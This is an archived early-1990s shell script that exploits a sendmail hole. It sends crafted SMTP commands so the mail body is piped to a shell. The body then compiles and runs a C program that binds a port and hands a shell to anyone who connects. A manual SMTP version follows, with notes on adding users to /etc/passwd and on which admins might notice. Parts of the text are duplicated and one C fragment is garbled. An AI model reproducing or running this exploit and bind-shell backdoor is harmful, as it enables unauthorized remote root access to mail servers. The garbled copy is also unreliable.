home *** CD-ROM | disk | FTP | other *** search
- #!/bin/sh
- # Copyright, 1992, 1993 by Scott Chasin (chasin@crimelab.com)
- #
- # This material is copyrighted by Scott Chasin, 1992, 1993. The
- # usual standard disclaimer applies, especially the fact that the
- # author is not liable for any damages caused by direct or indirect
- # use of the information or functionality provided by this program.
- #
- # Description:
- #
- # Exploit NEW sendmail hole and bind a port so we can spawn a program.
- # Not for distribution under any circumstances
- #
- # Usage: smail <hostname> <target-user-name> <target-port> <shell command>
- # default: smail <localhost> <daemon> <7001> </bin/sh>
-
- port=$3
- user=$2
- cmd=$4
- #
- # Usage: smail <hostname> <target-user-name> <target-port> <shell command>
- # default: smail <localhost> <daemon> <7001> </bin/sh>
-
- port=$3
- user=$2
- cmd=$4
-
- if [ -z "$2" ]; then
- user=daemon
- fi
-
- if [ -z "$3" ]; then
- port=7002
- fi
-
- if [ -z "$4" ]; then
- cmd="/bin/csh -i"
- fi
-
- (
- sleep 4
- echo "helo"
- echo "mail from: |"
- echo "rcpt to: bounce"
- echo "data"
- echo "."
- sleep 3
- echo "mail from: $user"
- echo "rcpt to: | sed '1,/^$/d' | sh"
- echo "data"
- echo "cat > /tmp/a.c <<EOF"
- cat << EOF
- #include <sys/types.h>
- #include <sys/signal.h>
- #include <sys/socket.h>
- #include <netinet/in.h>
- #include <netdb.h>
- reap(){int s;while(wait(&s)!=-1);}main(ac,av)int ac;
- int **av;{struct sockaddr_in mya;struct servent *sp
- ;fd_set muf;int myfd,new,x,maxfd=getdtablesize();
- signal(SIGCLD,reap);if((myfd=socket(AF_INET,SOCK_STREAM,
- 0))<0)exit(1);mya.sin_family=AF_INET;bzero(&mya.sin_addr,
- sizeof(mya.sin_addr));if((sp=getservbyname(av[1],"tcp"))
- ==(struct servent *)0){if(atoi(av[1])<=0)exit(1);mya.sin_port
- =htons(atoi(av[1]));}else mya.sin_port=sp->s_port;if(bind(myfd,
- (struct sockaddr *)&mya,sizeof(mya)))exit(1);if(listen(myfd,
- 1)<0)exit(1);loop: FD_ZERO(&muf);FD_SET(myfd,&muf);if
- (select(myfd+1,&muf,0,0,0)!=1||!FD_ISSET(myfd,&muf))goto
- loop;if((new=accept(myfd,0,0))<0)goto loop;if(fork()
- ==0){for(x=2;x<maxfd;x++)if(x!=new)close(x);for(x=0;x<
- NSIG;x++)signal(x,SIG_DFL);dup2(new,0);close(new);dup2
- (0,1);dup2(0,2);execv(av[2],av+2);exit(1);}close(new);
- goto loop;}
- EOF
- echo "EOF"
- echo "cd /tmp"
- echo "/bin/cc /tmp/a.c"
- echo "/bin/rm a.c"
- echo "/tmp/a.out $port $cmd"
- echo "."
- echo "quit"
- ) | mconnect $1
-
- Or you can also ul this to port 25.
- BTW, it gets you in by running a program that listens to port 7008...
- you telnet to port 7008. You can then proceed to create new users in
- /etc/passwd because you own the /etc dir...you need to type a ; after every
- command, and it gives you 1 error every command...ignore it. The process
- may be noticed by a few admins.
-
- helo
- mail from: |
- rcpt to: bounce
- data
- .
- mail from: bin
- rcpt to: | sed '1,/^$/d' | sh
- data
- cat > /tmp/a.c <<EOF
- #include <sys/types.h>
- #include <sys/signal.h>
- #include <sys/socket.h>
- #include <netinet/in.h>
- #include <netdb.h>
- reap(){int s;while(wait(&s)!=-1);}main(ac,av)int ac;
- int **av;{struct sockaddr_in mya;struct servent *sp
- ;fd_set muf;int myfd,new,x,maxfd=getdtablesize();
- signal(SIGCLD,reap);if((myfd=socket(AF_INET,SOCK_STREAM,
- 0))<0)exit(1);mya.sin_family=AF_INET;bzero(&mya.sin_addr,
- sizeof(mya.sin_addr));if((sp=getservbyname(av[1],"tcp"))
- ==(struct servent *)0){if(atoi(av[1])<=0)exit(1);mya.sin_port
- =htons(atoi(av[1]));}else mya.sin_port=sp->s_port;if(bind(myfd,
- (struct sockaddr *)&mya,sizeof(mya)))exit(1);if(listen(myfd,
- 1)<0)exit(1);loop: FD_ZERO(&muf);FD_SET(myfd,&muf);if
- (select(myfd+1,&muf,0,0,0)!=1||!FD_ISSET(myfd,&muf))goto
- loop;if((new=accept(myfd,0,0))<0)goto loop;if(fork()
- ,0))<0)goto loop;if(fork()
- ==0){for(x=2;x<maxfd;x++)if(x!=new)close(x);for(x=0;x<
- NSIG;x++)signal(x,SIG_DFL);dup2(new,0);close(new);dup2
- (0,1);dup2(0,2);execv(av[2],av+2);exit(1);}close(new);
- goto loop;}
- EOF
- cd /tmp
- /bin/cc /tmp/a.c
- /bin/rm a.c
- /tmp/a.out 7008 /bin/sh
- .
- quit
